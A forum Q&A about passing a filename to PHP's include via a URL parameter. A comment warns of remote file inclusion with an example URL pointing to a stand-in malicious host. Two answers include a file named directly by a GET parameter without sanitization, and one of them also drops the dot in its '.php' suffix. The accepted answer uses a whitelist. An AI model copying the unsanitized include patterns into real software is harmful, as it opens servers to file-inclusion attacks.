variable argument in include

Question

I'm sure that I use a wrong way but it's my first attempt to use php. The next code doesn't work. The variable $file is defined locally but I don't know how to use a global variable.

articles.php In this file I have a list :

<ol>
  <li><a <?php $file="a.php"; ?> href="article.php" > title 1 </a>  </li>
  <li><a <?php $file="b.php"; ?> href="article.php" > title 2  </a>  </li>
</ol>

article.php in this file I want to use this

  <?php   include("articles/$file"); ?>

How to define correctly $file ? Is there a better way to load a.php and b.php ?

be extraordinarily careful with this kind of code. right now, if this code was working, it'd open your server to a TOTAL and TRIVIALLY EASY remote compromise. e.g. `http://example.com?file=http://malicioussite.com/attack_script.php` and poof... you're executing a script of the attacker's choice. The `articles/` portion is a MINOR defense, but still allows an attacker to load up and display ANY file on your system that they know the full path for. — Marc B, Feb 28 '13 at 21:51

score 3 · Answer 1 · answered Feb 28 '13 at 21:46

You can do something like this:

articles.php

<ol>
  <li><a href="article.php?page=a" > title 1 </a></li>
  <li><a href="article.php?page=b" > title 2  </a></li>
</ol>

This will pass the variable page to article.php.

article.php

if( $_SERVER[REQUEST_METHOD] == 'GET' && !empty($_GET[page]) ) {
    $path = $_GET[page] . ".php"; // transform into a filename (a.php)

    if( file_exists($path) ) {
        include_once $path;
    }
}

Here, you will check if the requested method is GET and if the page variable is not empty. You then add .php to the variable to make it a complete file name and check if it exists. If it does, it will be included. Word of caution, this is not sanitized. You can add an array of acceptable file names and iterate through those to check if they're valid.

Thanks! I need to try your code and to try to understand the differences with others answers. — Altermundus, Feb 28 '13 at 22:08
The security seems to be very important with this kind of code. I need to study how to define an array of acceptable file names and how to use it. — Altermundus, Feb 28 '13 at 22:22

score 2 · Answer 2 · edited May 23 '17 at 10:25

2

You are doing it wrong.

Every php file execution is like separate application execution on server. Server forgets all variables after code is executed and page is sent to browser. You can't pass data from one page to other just like that.

To pass some value to next page you have to use one of these methods:

POST or GET
Cookie
Session

PHP web applications are very specyfic in that matter, and you have to learn this perfectly if you want to write web apps in PHP.

More information here:

PHP Pass variable to next page

edited May 23 '17 at 10:25

Community

1
1

answered Feb 28 '13 at 21:30

Kamil

13,363
24
88
183

Yes I understand that I used a wrong way. Your answer helps me to understand the other answers. – Altermundus Feb 28 '13 at 22:04

score 2 · Accepted Answer · answered Feb 28 '13 at 21:33

2

Pass it with e.g. $_GET:

<ol>
  <li><a href="article.php?f=a" > title 1 </a>  </li>
  <li><a href="article.php?f=b" > title 2  </a>  </li>
</ol>

Including any file without a sanity check is highly insecure. I would suggest to do it with a white list:

$file = $_GET['f'];
switch ($file){
   case 'a':
   case 'b':
      include('articles/'.$file.'.php');
      break;
   default:
      // don't do anything
}

HTH

answered Feb 28 '13 at 21:33

webcoder

56
4

Thanks for the switch idea but I don't understand the link between "sanity check" , "white list" and "switch". – Altermundus Feb 28 '13 at 22:19
if you get e.g. a 'c' as parameter it does not try to include it, because it is not on your whitelist a, b done with the cases in the switch. – webcoder Mar 01 '13 at 01:51

Kamil · Answer 4 · 2013-02-28T22:28:49.333

You probably trying to do something like this (this is passing some value via HTTP GET).

Page 1 (page1.php) - contains link with parameter file with value page3

<a href="page2.php?file=page3">

Page 2 (page2.php) - page supposed to be opened with "file" parameter in URL

<?php
    $file = $_GET["file"]; // takes parameter "file" from URL
    include($file."php");  // Dot is used for "adding" strings
?>

Page 3 (page3.php) - test page to include

<?php
    echo "This is included page3.php!"
?>

Consider this as simplest possible code for learning. There are many things to do in real application.

"In real world" you have to check (by using IF statement):

If file was called with GET request ($_SERVER[REQUEST_METHOD] == 'GET')
if there was parameter in url !empty($_GET['file'])
If file with name provided in URL exists file_exists($file."php")

to avoid PHP fatal errors, when someone write URL to your page2.php manually, without parameter or with wrong filename.

Aarolama Bluenk wrote answer with these necessary things to do (see below/above).

Interesting because this code looks simple. Do you know a good manual or site to understand how to manage pages with html and php ? It's necessary to understand the differences between the answers. — Altermundus, Feb 28 '13 at 22:13
I do. You may visit http://thenewboston.org or http://phpacademy.org very good video tutorials for PHP and other languages. — Kamil, Feb 28 '13 at 22:19
I added some additional information why my script is so simple (at the end of answer). — Kamil, Feb 28 '13 at 22:23

variable argument in include

4 Answers4